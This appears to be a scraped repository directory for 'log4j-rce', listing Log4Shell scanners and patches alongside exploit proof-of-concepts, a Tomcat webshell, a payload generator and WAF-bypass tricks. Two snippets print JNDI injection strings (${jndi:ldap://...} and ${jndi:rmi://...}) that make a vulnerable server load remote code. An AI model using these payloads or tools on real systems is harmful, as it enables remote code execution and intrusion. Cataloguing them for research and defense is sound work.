50 Repositories
Java log4j-rce Libraries
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
A pre-authenticated RCE exploit for Inductive Automation Ignition
Randy What This is a pre-authenticated RCE exploit for Inductive Automation Ignition that impacts versions = 8.1.16. We failed to exploit the bugs at
Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Log4-detector Scanner that detects vulnerable Log4J versions to help teams assess their exposure to CVE-2021-44228 (CRITICAL), CVE-2021-45046, CVE-202
An agent to hotpatch the log4j RCE from CVE-2021-44228.
Log4jHotPatch This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process
-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com
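log4j2 RCE, PoC
Apache Log4j 2 Apache log4j2 open-source logging component remote code execution. By constructing a malicious request, an attacker triggers the remote code execution vulnerability in the server's log4j 2 logging component. The vulnerability requires no special configuration; it has been verified that the latest patch protects against this issue. Latest official patch: log4j-2.15.0-rc2 Emergency mitigation: 2.10 or above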
Non intrusive log4j2 RCE vulnerability patch.
Log4j Patch Resolve the RCE vulnerability caused by JNDI lookup in log4j 2.0~2.14.1. It is licensed under the WTFPL 2.0 license, you can do anything w
Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions = 2.7.6 With Different Gadgets
The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da
F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB
CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java and ELF. Included Scan a single target Scan many targets Exploit with a shel
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)
Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4
Fixes the log4j exploit from being sent to Minecraft clients.
⚠️ DEPRECATION ⚠️ Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client. If you haven't already
spring-cloud-function SpEL RCE, Vultarget & Poc
spring-cloud-function SpEL RCE Vultarget You can build it for yourself. Here is the source of the Vuln App Or you can use the release which built by cc
Different Java Loggers Benchmarks.
Java Logger Benchmark JMH Benchmark for different Java Logger implementations. Idea of this benchmark is to put all loggers in the same conditions and
Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor
Apache Log4j 2 Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the
A Basic Java Application Vulnerable to the Log4Shell RCE
This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.
LOG4J Java exploit - WAF and patches bypass tricks
LOG4J Java exploit - WAF and patches bypass tr
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit if an attacker manages to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java
An LDAP RCE exploit for CVE-2021-44228 Log4Shell
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use
NukeJndiLookupFromLog4j Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use -Dlog4
Spring Boot Log4j - CVE-2021-44228 Docker Lab
Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046
Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
This project will help to test the Log4j CVE-2021-44228 vulnerability.
Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on
CVE-2021-44228 (Log4Shell) Proof of Concept
CVE-2021-44228 (Log4Shell) Proof of Concept Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect ag
reload4j is a drop-in replacement for log4j 1.2.17
What is reload4j? The reload4j project is a fork of Apache log4j version 1.2.17. It aims to fix the most urgent issues in log4j 1.2.17 which hasn't se
CVE-2021-44228 (Apache Log4j Remote Code Execution)
CVE-2021-44228 (Apache Log4j Remote Code Execution) all log4j-core versions >=2.0-beta9 and <=2.14.1 The version of 1.x has other vulnerabilities, it
Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite
Log4j2Scan This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use o
Log4j-payload-generator - Log4j jndi injects the Payload generator
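0x01 Introduction log4j-payload-generator is a plugin for the woodpecker framework that generates payloads for the log4 JNDI injection vulnerability. It can currently generate the following 5 types of payload with one click. Original payload {[upper|lower]:x}-type randomly mixed payload {[upper|lower]:x}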
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even if it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.
Oxygen-log4j-patcher - A tool that upgrades the log4j from an Oxygen installation to version 2.16
Oxygen XML Patch Tool for Apache Log4j vulnerability CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 This is a tool that updates the log4j version 2
Some tools to help mitigate Apache Log4j 2 CVE-2021-44228
JndiLookup Some tool to help analyzing Apache Log4j 2 CVE-2021-44228 This tool uses the "lookup" feature from log4j-2 to test against the JNDI vulnera
CVE-2021-44228 - Apache log4j RCE quick test
Build ./build.sh Start log4j RCE Server ./start-log4j-rce-server.sh Test Run java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in ha
Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...
Log4j CVE-2021-44228 and CVE-2021-45046 Requisites Use a vulnerable JDK, for instance JDK 1.8.0_181 Usage Malicious server The malicious server deploy
Log4J CVE-2021-44228 Minecraft PoC
CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin
Don't use this maliciously, this is for testing
log4j-exploit-example Don't use this maliciously, this is for testing Specifically for testing within Minecraft, but this will probably work on other
Based on spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)
Log4j 2 CVE-2021-44228 test sample application Based on spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1) Available endpoints Endpoint Request method Parameters vulnerable_request_get GET v=payload vulnerable_reque
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).
MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4
Scan and patch tool for CVE-2021-44228 and related log4j concerns.
A Log4J2 CVE-2021-44228 Vulnerability Scanner and Patcher Links to download the latest version: Linux x64 with glibc2.17+ (RHEL7+) Windows & all other
Small example repo for looking into log4j CVE-2021-44228
log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje
log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP
CVE-2021-44228-Demo An example of using CVE-2021-44228 to remotely inject code in two ways, via RMI and LDAP. Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex
TCS store test REST/Endpoints/Postman/log4j/java/hibernate/H2
# STORE REST API application (Customer, Product, Order, Order Items) Requirements To build and run the application you need: JDK 11 Maven
Exploitation techniques for going from a file upload vulnerability to RCE in Spring Boot Fat Jar applications
spring-boot-upload-file-lead-to-rce-tricks 1. Background article: Exploring the path from a Spring Boot Fat Jar file-write vulnerability to stable RCE 2. Setting up the vulnerable Docker environment docker pull landgrey/spring-boot-fat-jar-writ
CVE-2021-2109 && Weblogic Server RCE via JNDI
Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected
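Spring Boot basics tutorial, Spring Boot 2.x series in progress!!!
Spring Boot Basics Tutorial This project contains the sample programs for the "Spring Boot Basics Tutorial". Goal: build the most complete free Spring Boot tutorial on the web, better than paid tutorials! Join the community: if you are learning Spring Boot, feel free to join our Spring technical discussion group and grow together! How to support: follow my WeChat official account "程序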
Captures log entries for unit testing purposes
LogCaptor Install with maven dependency <groupId>io.github.hakky54</groupId> <artifactId>logcaptor</artifactId> <version>2.4.0</version>
Log annotation for logging frameworks
Herald "Why, sometimes I've believed as many as six impossible things before breakfast." - Lewis Carroll, Alice in Wonderland. Herald provides a very
Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback's architecture.
Apache Log4j 2 Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the